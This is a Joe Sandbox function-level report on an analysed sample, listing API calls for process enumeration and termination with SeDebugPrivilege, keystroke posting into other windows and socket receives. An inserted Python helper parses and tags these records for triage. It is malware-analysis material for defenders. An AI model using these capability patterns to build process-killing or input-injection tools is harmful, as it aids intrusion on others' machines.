                                                                                                                • Opcode ID: 0aad227ad300ea298d5fc7422c143d41df3b30e1ecd955fbc7e9e1f357be6ddf
                                                                                                                • Instruction ID: 698fd52d7ee14043923ab3fa8f1006fc8be1f9fff98a00ba4fc91020b7320794
                                                                                                                • Opcode Fuzzy Hash: 0aad227ad300ea298d5fc7422c143d41df3b30e1ecd955fbc7e9e1f357be6ddf
                                                                                                                • Instruction Fuzzy Hash: 75D1E035624701DFC724EF24D891A6ABBE5AF84314F14845DF8899B2E2DB30ECA5CF52
                                                                                                                APIs
                                                                                                                • select.WSOCK32 ref: 00259B38
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00259B45
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00259B6F
                                                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00259B90
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00259B9F
                                                                                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 00259C51
                                                                                                                • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0029DBF0), ref: 00259C0C
                                                                                                                  • Part of subcall function 0023E0F5: _strlen.LIBCMT ref: 0023E0FF
                                                                                                                  • Part of subcall function 0023E0F5: _memmove.LIBCMT ref: 0023E121
                                                                                                                • _strlen.LIBCMT ref: 00259CA7
                                                                                                                • _memmove.LIBCMT ref: 00259D10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3637404534-0
                                                                                                                • Opcode ID: 39183bdee57e70b201468879791e22c76f1648ccf46eb67f88095675884558ec
                                                                                                                • Instruction ID: a4dc8e42d56f3f997b0cedf48652d838e0e42bcbd6cbcebfe8e281a5ee86666d
                                                                                                                • Opcode Fuzzy Hash: 39183bdee57e70b201468879791e22c76f1648ccf46eb67f88095675884558ec
                                                                                                                • Instruction Fuzzy Hash: 6681DD71524300ABD710EF24DC45E6BB7F8EB88714F104A1DF9559B2D2DB30D968CBA2
                                                                                                                APIs
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0026B204
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 634782764-0
                                                                                                                • Opcode ID: c540f35d751a9d3fbcc9ba354d0308b1e8e43702b6e7d971549ae426ea8f7a5a
                                                                                                                • Instruction ID: 3a6985a486dcb88d6379f1e3e28737e639bb4a17a580098a41add9556cd66832
                                                                                                                • Opcode Fuzzy Hash: c540f35d751a9d3fbcc9ba354d0308b1e8e43702b6e7d971549ae426ea8f7a5a
                                                                                                                • Instruction Fuzzy Hash: AC51C530620215BFEF22AF28DC99F9E3BA5AF06354F204152FA15D62E1D771E9F08B50
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0027E9EA
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0027EA0B
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0027EA20
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0027EA3D
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0027EA64
                                                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0021A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0027EA6F
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0027EA8C
                                                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0021A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0027EA97
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268354404-0
                                                                                                                • Opcode ID: 298633b231efe73178f1f917343b66240ceb206e0c043e46d78f6bf3f40a76d3
                                                                                                                • Instruction ID: 807518c769f92719b78c751300d396b8f19aeb4c0ecae47abf6cb3cee937307e
                                                                                                                • Opcode Fuzzy Hash: 298633b231efe73178f1f917343b66240ceb206e0c043e46d78f6bf3f40a76d3
                                                                                                                • Instruction Fuzzy Hash: 2D516B74621205AFDF20DF64DC85FAA77F9BF18350F104619F956972D0D7B0E8A09B60
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0027E9A0,00000004,00000000,00000000), ref: 0021F737
                                                                                                                • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0027E9A0,00000004,00000000,00000000), ref: 0021F77E
                                                                                                                • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0027E9A0,00000004,00000000,00000000), ref: 0027EB55
                                                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0027E9A0,00000004,00000000,00000000), ref: 0027EBC1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ShowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268545403-0
                                                                                                                • Opcode ID: 61e3af2fa5cd5693da81dd9572a264b12e34aa212dcdb00c95a85d7e96ab98f3
                                                                                                                • Instruction ID: 709470845aa11f03a3fbf1dca9b44d10338f7d29d3ba7537ca71bb3bde38b5be
                                                                                                                • Opcode Fuzzy Hash: 61e3af2fa5cd5693da81dd9572a264b12e34aa212dcdb00c95a85d7e96ab98f3
                                                                                                                • Instruction Fuzzy Hash: C84150302346819ADBB45F38AECCAB6FBD57F25305F15586DE06B424F1C6B098E2C721
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002031DA
                                                                                                                  • Part of subcall function 00247C0C: GetFileAttributesW.KERNEL32(?,00246A7B), ref: 00247C0D
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00247ED2
                                                                                                                • _wcscmp.LIBCMT ref: 00247EEA
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00247F03
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesFullMoveNamePath_wcscmplstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 4093841705-0
                                                                                                                • Opcode ID: c3fbdedbf734fd018e8f993f70c282bdda2748a29f0e4f4eaf84056005482743
                                                                                                                • Instruction ID: 89386aab219ea43bf6a895c40bb581b7debaee4bb20cdabc8d970aefc92050af
                                                                                                                • Opcode Fuzzy Hash: c3fbdedbf734fd018e8f993f70c282bdda2748a29f0e4f4eaf84056005482743
                                                                                                                • Instruction Fuzzy Hash: BB414471825229AACF25EFA4EC45ADDB3BCAF08310F5045DAF515E3041EB319B99CFA4
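The function records on this page list raw import names and argument values exactly as the sandbox captured them, which leaves the reader to resolve ordinals and message constants by hand. The Python below is an added triage helper written for this page, not Joe Sandbox code: it parses that listing format, resolves the ordinal import #17.WSOCK32 to recvfrom using wsock32.dll's published export ordinals (the 0x10 last argument is sizeof(sockaddr_in), consistent with recvfrom's fromlen), decodes the window-message constants in the PostMessageW/SendMessageW records (0x0100/0x0101 are WM_KEYDOWN/WM_KEYUP, 0x25/0x27 are VK_LEFT/VK_RIGHT, 0x0080 is WM_SETICON with wParam ICON_SMALL=0 or ICON_BIG=1) and groups each function by a coarse capability tag. The capability tags are this editor's heuristic, and the sample input is constructed from the listings on this page, including the MapVirtualKeyW/PostMessageW record that follows.

```python
import re

# Partial WSOCK32.dll export-ordinal table (stable since Winsock 1.1).
WSOCK32_ORDINALS = {1: "accept", 2: "bind", 3: "closesocket", 4: "connect",
                    16: "recv", 17: "recvfrom", 18: "select", 19: "send",
                    20: "sendto", 23: "socket"}
# user32 constants needed to read the message-posting records.
WM_NAMES = {0x80: "WM_SETICON", 0x100: "WM_KEYDOWN", 0x101: "WM_KEYUP"}
VK_NAMES = {0x25: "VK_LEFT", 0x27: "VK_RIGHT"}
# Capability tags are this editor's heuristic, not a Joe Sandbox classification.
CAPABILITIES = {
    "process-creation": {"CreateProcessW", "CreateProcessA"},
    "socket-receive": {"recv", "recvfrom", "select"},
    "keystroke-injection": {"AttachThreadInput", "MapVirtualKeyW", "PostMessageW"},
}
# One report line: optional subcall prefix, NAME.MODULE, optional (args), "ref: ADDR".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")

# Constructed sample: lines copied from the listings on this page, arguments verbatim.
SAMPLE = """\
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00262760
Memory Dump Source
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
APIs
• select.WSOCK32 ref: 00259B38
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00259B90
• inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0029DBF0), ref: 00259C0C
  • Part of subcall function 0023E0F5: _strlen.LIBCMT ref: 0023E0FF
Memory Dump Source
• API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
APIs
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0027EA64
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0027EA8C
Memory Dump Source
APIs
  • Part of subcall function 0023E138: AttachThreadInput.USER32(00000000,?,0023CDFB,?,00000001), ref: 0023E166
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0023CE06
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0023CE23
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0023CE4D
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0023CE70
Memory Dump Source
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
"""

def resolve_name(api, mod):
    """Map an ordinal import such as '#17' on WSOCK32 to its export name."""
    if api.startswith("#") and mod.upper() == "WSOCK32":
        return WSOCK32_ORDINALS.get(int(api[1:]), api)
    return api

def parse_args(args):
    """'?' (value unknown to the sandbox) becomes None, hex literals become int."""
    return [] if not args else [None if a == "?" else int(a, 16) for a in args.split(",")]

def parse_records(text):
    """One dict per 'APIs' block: parsed calls plus the Similarity 'API ID' label."""
    records, current, in_api_list = [], None, False
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = {"calls": [], "api_id": None}
            records.append(current)
            in_api_list = True
        elif stripped == "Memory Dump Source":
            in_api_list = False
        elif current is not None and stripped.startswith("• API ID:"):
            current["api_id"] = stripped.split(":", 1)[1].strip()
        elif in_api_list and (m := API_LINE.match(line)):
            current["calls"].append({"api": resolve_name(m["api"], m["mod"]),
                                     "module": m["mod"], "args": parse_args(m["args"]),
                                     "ref": int(m["ref"], 16), "subcall": m["sub"] is not None})
    return records

def tag_capabilities(record):
    names = {c["api"] for c in record["calls"]}
    return sorted(tag for tag, apis in CAPABILITIES.items() if names & apis)

def decode_messages(record):
    """Render Post/SendMessageW calls as message name plus decoded wParam."""
    out = []
    for c in record["calls"]:
        if c["api"] in ("PostMessageW", "SendMessageW") and len(c["args"]) >= 3:
            msg, wparam = c["args"][1], c["args"][2]
            name = WM_NAMES.get(msg, "?" if msg is None else f"0x{msg:04X}")
            if name in ("WM_KEYDOWN", "WM_KEYUP"):
                out.append(f"{name} {VK_NAMES.get(wparam, '?' if wparam is None else hex(wparam))}")
            elif name == "WM_SETICON":
                out.append(f"{name} {'ICON_BIG' if wparam == 1 else 'ICON_SMALL'}")
            else:
                out.append(name)
    return out

def summarize(text=SAMPLE):
    """Per record: (resolved call names, capability tags, decoded messages)."""
    return [([c["api"] for c in r["calls"]], tag_capabilities(r), decode_messages(r))
            for r in parse_records(text)]

if __name__ == "__main__":
    for calls, tags, msgs in summarize():
        print(", ".join(calls), "->", tags, msgs)
```

Run it directly to print one line per record; for a full report, pass the text of the function listing to summarize(). The tag table is deliberately small: it flags the CreateProcessW, select/recvfrom and AttachThreadInput/PostMessageW clusters that matter for triage of this sample and leaves everything else untagged, so a record with no tags is simply one the heuristic does not know, not a benign one.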
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0023E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0023E158
                                                                                                                  • Part of subcall function 0023E138: GetCurrentThreadId.KERNEL32 ref: 0023E15F
                                                                                                                  • Part of subcall function 0023E138: AttachThreadInput.USER32(00000000,?,0023CDFB,?,00000001), ref: 0023E166
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0023CE06
                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0023CE23
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0023CE26
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0023CE2F
                                                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0023CE4D
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0023CE50
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0023CE59
                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0023CE70
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0023CE73
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2014098862-0
                                                                                                                • Opcode ID: f1fec23def5fec49fe3a42e9b0597df52c56eebfccd80b53d77367b0aae609ff
                                                                                                                • Instruction ID: 9a1e96456829f0be0b809df689cff5ec77b5b9d4e49b3c99318f5c6261777822
                                                                                                                • Opcode Fuzzy Hash: f1fec23def5fec49fe3a42e9b0597df52c56eebfccd80b53d77367b0aae609ff
                                                                                                                • Instruction Fuzzy Hash: 4C1104B5520618BEFB102FA0AC8EF6A3B2DDF08754F210515F3446B0E0C9F2AC109BA4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                • API String ID: 0-572801152
                                                                                                                • Opcode ID: a4585886c9374f5ebff827e1d52612f3c876fb570804301947c603546fa6e5b4
                                                                                                                • Instruction ID: 3f274d4432d7643532086261eee5e4822005a9183672378b7932e69bf936cc29
                                                                                                                • Opcode Fuzzy Hash: a4585886c9374f5ebff827e1d52612f3c876fb570804301947c603546fa6e5b4
                                                                                                                • Instruction Fuzzy Hash: 2CE1D371A2031AAFDF14DF64C881AAE77B5FF48315F244029FD45AB281E7709D68CB94
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
                                                                                                                  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
                                                                                                                  • Part of subcall function 00203BCF: _wcscpy.LIBCMT ref: 00203BF2
                                                                                                                • _wcstok.LIBCMT ref: 00251D6E
                                                                                                                • _wcscpy.LIBCMT ref: 00251DFD
                                                                                                                • _memset.LIBCMT ref: 00251E30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                • String ID: X$t:+p:+
                                                                                                                • API String ID: 774024439-166109747
                                                                                                                • Opcode ID: beb2a219eb6a64fc0a8726f91a311c33a8f564c920d2d6d081ef30957678425c
                                                                                                                • Instruction ID: b9ca27b53a6443dbf8bd1f4bc35ba4502989ef6838a974772b20d96aa327f528
                                                                                                                • Opcode Fuzzy Hash: beb2a219eb6a64fc0a8726f91a311c33a8f564c920d2d6d081ef30957678425c
                                                                                                                • Instruction Fuzzy Hash: C2C16F715283019FC714EF24C881A9BB7E4BF85314F10496DF89A972A2DB70ED69CF92
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00261B09
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00261B17
                                                                                                                • __wsplitpath.LIBCMT ref: 00261B45
                                                                                                                  • Part of subcall function 0022297D: __wsplitpath_helper.LIBCMT ref: 002229BD
                                                                                                                • _wcscat.LIBCMT ref: 00261B5A
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00261BD0
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00261BE2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                • String ID: hE+
                                                                                                                • API String ID: 1380811348-2553741706
                                                                                                                • Opcode ID: 0a0923e4e57803438e1652cb70c4791744cc27aa8d560facf56bcaf5cfa63b79
                                                                                                                • Instruction ID: a07eb8f86ee8267161976491152a3d110a368050c80dcafe7760b680ce9b99d1
                                                                                                                • Opcode Fuzzy Hash: 0a0923e4e57803438e1652cb70c4791744cc27aa8d560facf56bcaf5cfa63b79
                                                                                                                • Instruction Fuzzy Hash: E5518071514300AFD320EF24D885EABB7E8AF88754F14491EF58597291EB30E964CFA2
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00269926
                                                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 0026993A
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00269954
                                                                                                                • _wcscat.LIBCMT ref: 002699AF
                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 002699C6
                                                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002699F4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window_wcscat
                                                                                                                • String ID: SysListView32
                                                                                                                • API String ID: 307300125-78025650
                                                                                                                • Opcode ID: 9d1939ce0d5e124ade51f5943fec363243e3acca739561e05e8b74576c0f74c8
                                                                                                                • Instruction ID: e586534b6eaaf06ef5f2bb3c80766bab5bd5a56abbabf68708c0cc65d7312c58
                                                                                                                • Opcode Fuzzy Hash: 9d1939ce0d5e124ade51f5943fec363243e3acca739561e05e8b74576c0f74c8
                                                                                                                • Instruction Fuzzy Hash: CD41C274A10309ABEF219FA4DC85FEE77ACEF09350F10052AF549A7292D6719DE4CB60
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00246F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00246F7D
                                                                                                                  • Part of subcall function 00246F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00246F8D
                                                                                                                  • Part of subcall function 00246F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00247022
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0026168B
                                                                                                                • GetLastError.KERNEL32 ref: 0026169E
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002616CA
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00261746
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00261751
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00261786
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                • Opcode ID: e2e3879a911191e4c456c92d1b5e0d4d58e3a86113a40369947e305082283416
                                                                                                                • Instruction ID: 846287b888e813be9bf5a9b3ed8b69e009f22f8755b53bdc97508366eca138a5
                                                                                                                • Opcode Fuzzy Hash: e2e3879a911191e4c456c92d1b5e0d4d58e3a86113a40369947e305082283416
                                                                                                                • Instruction Fuzzy Hash: 1441CE75620201AFDB19EF64CCE5FADB7A5AF54314F088048F9069F2D2DBB4A8A4CF51
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 002462D6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
